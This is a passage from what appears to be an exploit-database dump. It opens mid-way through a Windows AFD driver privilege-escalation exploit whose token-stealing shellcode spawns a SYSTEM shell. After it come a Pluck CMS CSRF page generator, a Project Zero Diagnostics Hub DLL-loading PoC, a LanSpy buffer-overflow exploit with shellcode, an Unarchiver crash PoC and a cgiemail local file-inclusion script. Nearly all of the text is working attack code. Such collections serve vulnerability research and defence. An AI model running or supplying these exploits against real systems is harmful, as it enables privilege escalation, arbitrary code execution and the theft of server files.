ZwDeviceIoControlFile = GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwDeviceIoControlFile");
if(!ZwDeviceIoControlFile)
{
printf(" [-] Could not find ZwDeviceIoControlFile\n");
return -1;
}
printf(" [+] ZwDeviceIoControlFile\n");
printf(" [*] Address: %#010x\n", ZwDeviceIoControlFile);
////////////////////////////////////////////////////////////////
// SETUP EXPLOITATION PREREQUISITE
////////////////////////////////////////////////////////////////
printf("[*] Setting up exploitation prerequisite\n");
// initialize Winsock DLL
printf (" [*] Initialising Winsock DLL\n");
WORD wVersionRequested;
WSADATA wsaData;
int wsaStartupErrorCode;
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms632663(v=vs.85).aspx
wVersionRequested = MAKEWORD(2, 2);
// initiate the use of the Winsock DLL
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms742213(v=vs.85).aspx
wsaStartupErrorCode = WSAStartup(wVersionRequested, &wsaData);
if(wsaStartupErrorCode != 0)
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
printf(" [-] Failed (error code: %d)\n", wsaStartupErrorCode);
return -1;
}
printf(" [+] Done\n");
// create socket
printf(" [*] Creating socket\n");
SOCKET targetDeviceSocket = INVALID_SOCKET;
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms742212(v=vs.85).aspx
targetDeviceSocket = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
if(targetDeviceSocket == INVALID_SOCKET)
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
printf(" [-] Failed (error code: %ld)\n", WSAGetLastError());
return -1;
}
printf(" [+] Done\n");
// connect to a closed port
// connect to port 0 on the local machine
struct sockaddr_in clientService;
clientService.sin_family = AF_INET;
clientService.sin_addr.s_addr = inet_addr("127.0.0.1");
clientService.sin_port = htons(0);
printf(" [*] Connecting to closed port\n");
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms737625(v=vs.85).aspx
int connectResult;
connectResult = connect(targetDeviceSocket, (SOCKADDR *) &clientService, sizeof(clientService));
if (connectResult == 0)
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
printf (" [-] Connected (error code: %ld)\n", WSAGetLastError());
return -1;
}
printf(" [+] Done\n");
////////////////////////////////////////////////////////////////
// CREATE TOKEN STEALING SHELLCODE
////////////////////////////////////////////////////////////////
printf("[*] Creating token stealing shellcode\n");
// construct the token stealing shellcode
unsigned char shellcode[] =
{
0x52, // PUSH EDX Save EDX on the stack (save context)
0x53, // PUSH EBX Save EBX on the stack (save context)
0x33,0xC0, // XOR EAX, EAX Zero out EAX (EAX = 0)
0x64,0x8B,0x80,0x24,0x01,0x00,0x00, // MOV EAX, FS:[EAX+0x124] Retrieve current _KTHREAD structure
0x8B,0x40,shellcode_KPROCESS, // MOV EAX, [EAX+_KPROCESS] Retrieve _EPROCESS structure
0x8B,0xC8, // MOV ECX, EAX Copy EAX (_EPROCESS) to ECX
0x8B,0x98,shellcode_TOKEN,0x00,0x00,0x00, // MOV EBX, [EAX+_TOKEN] Retrieve current _TOKEN
0x8B,0x80,shellcode_APLINKS,0x00,0x00,0x00, // MOV EAX, [EAX+_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xE8,shellcode_APLINKS,0x00,0x00,0x00, // SUB EAX, _APLINKS | Retrieve EPROCESS from ActiveProcessLinks
0x81,0xB8,shellcode_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // CMP [EAX+_UPID], 0x4 | Compare UniqueProcessId with 4 (System Process)
0x75,0xE8, // JNZ/JNE ---- Jump if not zero/not equal
0x8B,0x90,shellcode_TOKEN,0x00,0x00,0x00, // MOV EDX, [EAX+_TOKEN] Copy SYSTEM _TOKEN to EDX
0x8B,0xC1, // MOV EAX, ECX Copy ECX (current process _TOKEN) to EAX
0x89,0x90,shellcode_TOKEN,0x00,0x00,0x00, // MOV [EAX+_TOKEN], EDX Copy SYSTEM _TOKEN to current process _TOKEN
0x5B, // POP EBX Pop current stack value to EBX (restore context)
0x5A, // POP EDX Pop current stack value to EDX (restore context)
0xC2,0x08 // RET 8 Return
};
printf(" [*] Shellcode assembled\n");
// allocate memory (RWE permissions) for the shellcode
printf(" [*] Allocating memory\n");
LPVOID shellcodeAddress;
shellcodeAddress = VirtualAlloc((PVOID) 0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
int errorCode = 0;
if(shellcodeAddress == NULL)
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
errorCode = GetLastError();
// in case of ERROR_INVALID_ADDRESS
if(errorCode == 487)
{
// Attempt to access invalid address
// occurs since a fixed address is being reserved
// http://stackoverflow.com/questions/21368429/error-code-487-error-invalid-address-when-using-virtualallocex
printf(" [!] Could not reserve entire range\n");
printf(" [*] Rerun exploit\n");
}
// in case of any other error
else
printf(" [-] Failed (error code: %d)\n", errorCode);
return -1;
}
printf(" [+] Address: %#010x\n", shellcodeAddress);
// copy the shellcode to the allocated memory
memset(shellcodeAddress, 0x90, 0x20000);
memcpy((shellcodeAddress + 0x10000), shellcode, sizeof(shellcode));
printf(" [*] Shellcode copied\n");
////////////////////////////////////////////////////////////////
// EXPLOIT THE VULNERABILITY
////////////////////////////////////////////////////////////////
printf("[*] Exploiting vulnerability\n");
// send AFD socket connect request
printf(" [*] Sending AFD socket connect request\n");
DWORD lpInBuffer[lpInBufferSize];
memset(lpInBuffer, 0, (lpInBufferSize * sizeof(DWORD)));
lpInBuffer[3] = 0x01;
lpInBuffer[4] = 0x20;
ULONG lpBytesReturned = 0;
if(DeviceIoControl(
(HANDLE) targetDeviceSocket,
0x00012007, // IOCTL_AFD_CONNECT
(PVOID) lpInBuffer, sizeof(lpInBuffer),
(PVOID) (HalDispatchTableKrnlSpcAddr + 0x6), 0x0,
&lpBytesReturned, NULL
) == 0)
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms679360(v=vs.85).aspx
errorCode = GetLastError();
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
// in case of ERROR_INVALID_NETNAME
if(errorCode == 1214)
{
// AFD socket connect request successful
printf(" [+] Done\n");
}
// in case of ERROR_NOACCESS
else if(errorCode == 998)
{
// AFD socket connect request unsuccessful - target is patched
printf(" [!] Target patched\n");
printf(" [*] Possible security patches\n");
for(i = 0; i < securityPatchesCount; i++)
printf(" [*] %s\n", securityPatchesPtr[i]);
return -1;
}
// in case of any other error message
else
{
// print the error code
printf(" [-] Failed (error code: %d)\n", errorCode);
return -1;
}
}
// elevate privileges of the current process
printf(" [*] Elevating privileges to SYSTEM\n");
ULONG outInterval = 0;
// https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FProfile%2FNtQueryIntervalProfile.html
NtQueryIntervalProfile(2, &outInterval);
printf(" [+] Done\n");
// spawn shell (with elevated privileges)
printf(" [*] Spawning shell\n");
// spawn SYSTEM shell within the current shell (remote shell friendly)
system ("c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32");
// clean up and exit
printf("\n[*] Exiting SYSTEM shell\n");
WSACleanup();
return 1;
}
// EoF
# Exploit Title: Pluck CMS 4.7.3 - Add-Page Cross-Site Request Forgery
# Exploit Author: Ahsan Tahir
# Date: 18-10-2016
# Software Link: http://www.pluck-cms.org/?file=download
# Vendor: http://www.pluck-cms.org/
# Google Dork: "2005-2016. pluck is available"
# Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial
# Website: www.ahsan-tahir.com
# Category: webapps
# Version: 4.7.3
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email: mrahsan1337@gmail.com
import os
import urllib
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def csrfexploit():
banner = '''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==+
| ____ _ _ ____ __ __ ____ |
| | _ \| |_ _ ___| | __ / ___| \/ / ___| |
| | |_) | | | | |/ __| |/ / | | | |\/| \___ \ |
| | __/| | |_| | (__| < | |___| | | |___) | |
| |_| |_|\__,_|\___|_|\_\ \____|_| |_|____/ |
| //PluckCMS 4.7.3 Add-Post CSRF Auto-Exploiter |
| > Exploit Author & Script Coder: Ahsan Tahir |
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+
'''
print banner
url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://): "))
title = str(raw_input(" [+] Enter the Title of the Post which you want to add by exploiting CSRF: "))
content = raw_input(" [+] Enter the Content, which you want to add in the post by exploiting CSRF: ")
csrfhtmlcode = '''
<html>
<!-- CSRF PoC -->
<body>
<form action="%s/admin.php?action=editpage" method="POST">
<input type="hidden" name="title" value="%s" />
<input type="hidden" name="seo_name" value="" />
<input type="hidden" name="content" value="%s" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="keywords" value="" />
<input type="hidden" name="hidden" value="no" />
<input type="hidden" name="sub_page" value="" />
<input type="hidden" name="theme" value="default" />
<input type="hidden" name="save" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
''' %(url, title, content)
print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
extension = ".html"
name = raw_input(" Filename: ")
filename = name+extension
file = open(filename, "w")
file.write(csrfhtmlcode)
file.close()
print(" [+] Your exploit is saved as %s")%filename
print("")
csrfexploit()
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=887
Windows: Diagnostics Hub DLL Load EoP
Platform: Windows 10 10586, not tested 8.1 Update 2 or Windows 7
Class: Elevation of Privilege
Summary:
The fix for CVE-2016-3231 is insufficient to prevent a normal user specifying an insecure agent path leading to arbitrary DLL loading at system privileges.
Description:
CVE-2016-3231 was an issue caused by passing a relative agent path name which allowed the DLL path loaded for the agent DLL to be redirected to another file. This seems to have been fixed and as far as I can tell this issue is no longer exploitable from a sandbox. However the problem is there’s an assumption that it’s not possible to write a file to the system32 directory, which technically is true but practically for this exploit false.
As I’ve blogged about before, and also submitted bugs (for example MSRC-21233) a normal user can created named streams on directories as long as they have FILE_ADD_FILE access right to the directory. When you do this you create what looks from a path perspective to be in the parent. For example the system32\tasks folder is writable by a normal user, so you can copy a DLL to system32\tasks:abc.dll and when GetFullPathName is called the filename returned is tasks:abc.dll. When the GetValidAgentPath is called it checks if this file is in system32 by using GetFileAttributes, which succeeds and the service will proceed to load the file.
On the fixing side of things, I can’t see an obvious reason why just checking for invalid path characters in the agent path wouldn’t be sufficient (and in fact would arguably have fixed the original bug as well). Of course I think it’s slightly dodgy that you’ll load any DLL from system32, even ones which aren’t agent DLLs. You’d have to find something which was somehow exploitable in a very short time window during DllMain but it might work.
Also I wonder whether they’re any legitimate uses for named streams on NTFS directories? While it’s certainly out of scope perhaps they could only be created by admins? Or perhaps the access check shouldn’t be on the target directories but its parent directory where the effective file appears to be located.
Proof of Concept:
I’ve provided a PoC as a C++ source code file. You’ll also need a DLL to test load, I’ve not provided one of these but any should do, as long as it matches the bitness of the OS.
1) Compile the C++ source code file.
2) Execute the poc passing the path to the DLL you want to load in the service as a normal user.
3) It should print that the DLL was loaded successfully.
Expected Result:
The loading of a DLL fails as the path is rejected.
Observed Result:
The DLL is loaded successfully.
*/
// ExploitCollector.cpp : Defines the entry point for the console application.
//
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <comdef.h>
#include <strsafe.h>
GUID CLSID_CollectorService =
{ 0x42CBFAA7, 0xA4A7, 0x47BB,{ 0xB4, 0x22, 0xBD, 0x10, 0xE9, 0xD0, 0x27, 0x00, } };
class __declspec(uuid("f23721ef-7205-4319-83a0-60078d3ca922")) ICollectionSession : public IUnknown {
public:
virtual HRESULT __stdcall PostStringToListener(REFGUID, LPWSTR) = 0;
virtual HRESULT __stdcall PostBytesToListener() = 0;
virtual HRESULT __stdcall AddAgent(LPWSTR path, REFGUID) = 0;
//.rdata:0000000180035868 dq offset ? Start@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Start(tagVARIANT *)
//.rdata:0000000180035870 dq offset ? GetCurrentResult@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJFPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetCurrentResult(short, tagVARIANT *)
//.rdata:0000000180035878 dq offset ? Pause@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJXZ; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Pause(void)
//.rdata:0000000180035880 dq offset ? Resume@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJXZ; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Resume(void)
//.rdata:0000000180035888 dq offset ? Stop@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Stop(tagVARIANT *)
//.rdata:0000000180035890 dq offset ? TriggerEvent@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJW4SessionEvent@@PEAUtagVARIANT@@11@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::TriggerEvent(SessionEvent, tagVARIANT *, tagVARIANT *, tagVARIANT *)
//.rdata:0000000180035898 dq offset ? GetGraphDataUpdates@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJAEBU_GUID@@PEAUtagSAFEARRAY@@PEAUGraphDataUpdates@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetGraphDataUpdates(_GUID const &, tagSAFEARRAY *, GraphDataUpdates *)
//.rdata:00000001800358A0 dq offset ? QueryState@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAW4SessionState@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::QueryState(SessionState *)
//.rdata:00000001800358A8 dq offset ? GetStatusChangeEventName@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAPEAG@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetStatusChangeEventName(ushort * *)
//.rdata:00000001800358B0 dq offset ? GetLastError@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAJ@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetLastError(long *)
//.rdata:00000001800358B8 dq offset ? SetClientDelegate@EtwCollectionSession@StandardCollector@DiagnosticsHub@Mic
};
struct SessionConfiguration
{
DWORD version; // Needs to be 1
DWORD a1; // Unknown
DWORD something; // Also unknown
DWORD monitor_pid;
GUID guid;
BSTR path; // Path to a valid directory
CHAR trailing[256];
};
class __declspec(uuid("7e912832-d5e1-4105-8ce1-9aadd30a3809")) IStandardCollectorClientDelegate : public IUnknown
{
};
class __declspec(uuid("0d8af6b7-efd5-4f6d-a834-314740ab8caa")) IStandardCollectorService : public IUnknown
{
public:
virtual HRESULT __stdcall CreateSession(SessionConfiguration *, IStandardCollectorClientDelegate *, ICollectionSession **) = 0;
virtual HRESULT __stdcall GetSession(REFGUID, ICollectionSession **) = 0;
virtual HRESULT __stdcall DestroySession(REFGUID) = 0;
virtual HRESULT __stdcall DestroySessionAsync(REFGUID) = 0;
virtual HRESULT __stdcall AddLifetimeMonitorProcessIdForSession(REFGUID, int) = 0;
};
_COM_SMARTPTR_TYPEDEF(IStandardCollectorService, __uuidof(IStandardCollectorService));
_COM_SMARTPTR_TYPEDEF(ICollectionSession, __uuidof(ICollectionSession));
class CoInit
{
public:
CoInit() {
CoInitialize(nullptr);
}
~CoInit() {
CoUninitialize();
}
};
void ThrowOnError(HRESULT hr)
{
if (hr != 0)
{
throw _com_error(hr);
}
}
int wmain(int argc, wchar_t** argv)
{
if (argc < 2)
{
printf("poc path\\to\\dll\n");
return 1;
}
CoInit coinit;
try
{
GUID name;
CoCreateGuid(&name);
LPOLESTR name_str;
StringFromIID(name, &name_str);
WCHAR random_name[MAX_PATH];
StringCchPrintf(random_name, MAX_PATH, L"tasks:%ls.dll", name_str);
WCHAR target[MAX_PATH];
GetSystemDirectory(target, MAX_PATH);
StringCchCat(target, MAX_PATH, L"\\");
StringCchCat(target, MAX_PATH, random_name);
WCHAR valid_dir[MAX_PATH];
GetModuleFileName(nullptr, valid_dir, MAX_PATH);
WCHAR* p = wcsrchr(valid_dir, L'\\');
*p = 0;
StringCchCat(valid_dir, MAX_PATH, L"\\etw");
CreateDirectory(valid_dir, nullptr);
if (!CopyFile(argv[1], target, FALSE))
{
printf("Error copying file %d\n", GetLastError());
return 1;
}
IStandardCollectorServicePtr service;
ThrowOnError(CoCreateInstance(CLSID_CollectorService, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&service)));
DWORD authn_svc;
DWORD authz_svc;
LPOLESTR principal_name;
DWORD authn_level;
DWORD imp_level;
RPC_AUTH_IDENTITY_HANDLE identity;
DWORD capabilities;
ThrowOnError(CoQueryProxyBlanket(service, &authn_svc, &authz_svc, &principal_name, &authn_level, &imp_level, &identity, &capabilities));
ThrowOnError(CoSetProxyBlanket(service, authn_svc, authz_svc, principal_name, authn_level, RPC_C_IMP_LEVEL_IMPERSONATE, identity, capabilities));
SessionConfiguration config = {};
config.version = 1;
config.monitor_pid = ::GetCurrentProcessId();
CoCreateGuid(&config.guid);
bstr_t path = valid_dir;
config.path = path;
ICollectionSessionPtr session;
ThrowOnError(service->CreateSession(&config, nullptr, &session));
GUID agent_guid;
CoCreateGuid(&agent_guid);
ThrowOnError(session->AddAgent(random_name, agent_guid));
}
catch (const _com_error& error)
{
if (error.Error() == 0x8007045A)
{
printf("DLL should have been loaded\n");
}
else
{
printf("%ls\n", error.ErrorMessage());
printf("%08X\n", error.Error());
}
}
return 0;
}
#!/usr/bin/python
### LanSpy 2.0.0.155 - Buffer Overflow Exploit by n30m1nd ###
# Date: 2016-10-18
# Exploit Author: n30m1nd
# Vendor Homepage: www.lantricks.com
# Software Link: https://www.exploit-db.com/apps/42114d0f9e88ad76acaa0f145dabf923-lanspy_setup.exe
# Version: LanSpy 2.0.0.155
# Tested on: Tested on Win7 32bit and Win10 64 bit
# Platforms
# =========
# Tested on Win7 32bit and Win10 64 bit
# This exploit should work everywhere since the binary does not implement DEP nor ASLR
# Credits
# =======
# Shouts to hyp3rlinx for the PoC:
# https://www.exploit-db.com/exploits/38399/
# http://hyp3rlinx.altervista.org/
# And shouts to the crew at Offensive Security for their huge efforts on making
# the infosec community better
# How to
# ======
# * Run this python script. It will generate an "addresses.txt" file.
# * Replace this file in the root directory of your LanSpy.exe installation.
# * Run LanSpy.exe and start the scan or do so by pressing F3.
# - You can also call LanSpy.exe from the command line like the following and
# it will run the exploit straight away: echo n30 | C:\Path\To\LanSpy.exe
# Exploit code
# ============
import struct
# 32bit Alphanum-ish shellcodes
# Bad chars detected: 00 2d 20
# MessageBoxA at => 00404D80
msgbox_shellcode = (
"\x31\xC0\x50\x68"
"\x70\x77\x6E\x64"
"\x54\x5F\x50\x57"
"\x57\x50\x35\xC4"
"\x80\x80\x55\x35"
"\x44\xCD\xC0\x55"
"\x50\xC3"
)
# WinExec at -> 004EC4FF
calc_shellcode = (
"\x31\xC0\x50\x68"
"\x63\x61\x6C\x63"
"\x54\x5F\x50\x57"
"\x35\xC3\x4E\xC3"
"\x55\x35\x3C\x8A"
"\x8D\x55\x50\xC3"
)
# Change the shellcode to be used here
scde = calc_shellcode
#scde = msgbox_shellcode
# 126 are the bytes to jmp back with opcode \x74\x80 => ja -80h and it is where our shellcode resides
junk = 'A'*(676-126)
if len(scde) > 126:
exit("[e] Shellcode is too big! Egghunter maybe? ;)")
# 0040407D => jmp ecx inside LanSpy
jecx = 'A'*(126-len(scde))+'\x74\x80CC'+struct.pack('<I', 0x0040407D)
# Junk + Shellcode for calc + jump to our first stage jump which jumps to the second stage calc shellcode
payl = junk + scde + jecx
with open("addresses.txt", "wb") as f:
f.write(payl)
f.close()
# Exploit Title: The Unarchiver 3.11.1 '.tar.Z' Local Crash PoC
# Date: 10-17-2016
# Exploit Author: Antonio Z.
# Vendor Homepage: http://unarchiver.c3.cx/unarchiver
# Software Link: http://unarchiver.c3.cx/downloads/TheUnarchiver3.11.1.zip
# Version: 3.11.1
# Tested on: OS X 10.10, OS X 10.11, OS X 10.12
# More information: https://opensource.apple.com/source/gnuzip/gnuzip-11/gzip/lzw.h
import os, struct, sys
from mmap import mmap
if len(sys.argv) <= 1:
print "Usage: python Local_Crash_PoC.py [file name]"
exit()
file_name = sys.argv[1]
file_mod = open(file_name, 'r+b')
file_hash = file_mod.read()
def get_extension(file_name):
basename = os.path.basename(file_name)
extension = '.'.join(basename.split('.')[1:])
return '.' + extension if extension else None
def file_maping():
maping = mmap(file_mod.fileno(),0)
maping.seek(2)
maping.write_byte(struct.pack('B', 255))
maping.close()
new_file_name = "Local_Crash_PoC" + get_extension(file_name)
os.popen('cp ' + file_name + ' ' + new_file_name)
file_mod = open(new_file_name, 'r+b')
file_maping()
file_mod.close()
print '[+] ' + 'Created file: ' + new_file_name
#!/usr/bin/env perl
# Exploit Title: cgiemail local file inclusion
# Vendor Homepage: http://web.mit.edu/wwwdev/cgiemail/webmaster.html
# Software Link: http://web.mit.edu/wwwdev/cgiemail/cgiemail-1.6.tar.gz
# Version: 1.6 and older
# Date: 2016-09-27
# cgiecho a script included with cgiemail will return any file under a
# websites document root if the file contains square brackets and the text
# within the brackets is guessable.
# cgiemail is currently shipped with cPanel and is enabled by default.
# Example: http://hostname/cgi-sys/cgiecho/login.php?'pass'=['pass']
# will display http://hostname/login.php if login.php contains $_POST['pass']
##
# cgiemail local file inclusion exploit
# Author: Finbar Crago <finbar.crago@gmail.com>
# https://github.com/finbar-crago/cgiemail-exploit
##
use strict;
use warnings;
use POSIX;
use LWP::UserAgent;
use HTML::Entities;
use Getopt::Long;
$|++; $\="\n"; $,=" ";
sub usage {
die <<"EOF";
cgiemail local file inclusion exploit
Usage: $0 [options] target
Options:
--names Check for names in commer separated list
--num Check for numbers
--num-max Maximum number to check (default 10)
--batch Number of arguments sent per request (default 10)
--cgiecho-path Path of cgiecho on server (default '/cgi-sys/cgiecho/')
--user-agent Set user-agent (default 'Mozilla/5.0')
--deley Pause between requests in seconds (default 1)
--timeout Set connection timeout (default 10)
Example:
$0 --num --names 'email,password' http://hostname/login.php > login.php
EOF
}
my $names;
my $num = 0;
my $num_max = 10;
my $batch = 10;
my $cgiecho_path = '/cgi-sys/cgiecho';
my $user_agent = 'Mozilla/5.0';
my $timeout = 10;
my $deley = 1;
GetOptions(
'names=s' => \$names,
'num' => \$num,
'num-max=i' => \$num_max,
'batch=i' => \$batch,
'cgiecho-path' => \$cgiecho_path,
'user-agent=s' => \$user_agent,
'deley=i' => \$deley,
'timeout=i' => \$timeout,
);
usage unless
defined $ARGV[0] &&
$ARGV[0] =~ m|^(https?://)?([a-z\d.-]+)/?(.*)?|i;
my $conn=$1||'http://';my $host=$2;my $path=$3||'index.php';
my $url = "$conn$host/$cgiecho_path/$path";
my @list= ();
if($num){ push @list, $_ for 0..$num_max }
if($names){
push @list, "%22$_%22","%27$_%27" for split/,/,$names;
}
my $ua = LWP::UserAgent->new;
$ua->agent($user_agent);
$ua->timeout($timeout);
$batch--;
my $i=0;
my $end = ceil($#list/$batch);
while($#list+1){
my $args='?';
my $to = ($#list > $batch)?$batch:$#list;
$args.="$_=[$_]&" for @list[0..$to];
@list = @list[$to+1..$#list];
my $res = $ua->get($url.$args);
die $res->status_line if !$res->content_is_html;
my $html = $res->decoded_content;
if($html !~ />cgiemail[\n\r ]*([\d.]+)/){
print "cgiemail not found" if !$i;
print "cgiemail was here but now it's not..." if $i;
exit -1;
} print STDERR "detected cgiemail $1" if !$i;
print STDERR "\e[Jrequest ".++$i." of $end...";
if($res->code == 200){
$html =~ m|<PRE>(.+)</PRE>|s;
print decode_entities($1);
print STDERR "success!";
exit;
}
if($res->code == 500){
if($html =~ m|500 Could not open template - No such file or directory|){
print STDERR "the file /$path doesn't exist...";
}
elsif($html =~ m|500 Empty template file|){
print STDERR "/$path is a directory...";
}
else{
print STDERR "unknown 500 error:";
print STDERR $html;
}
exit -1;
}
select(undef,undef,undef,$deley); printf "\eM";
}
print STDERR "sorry, no match found for $path";
exit -1;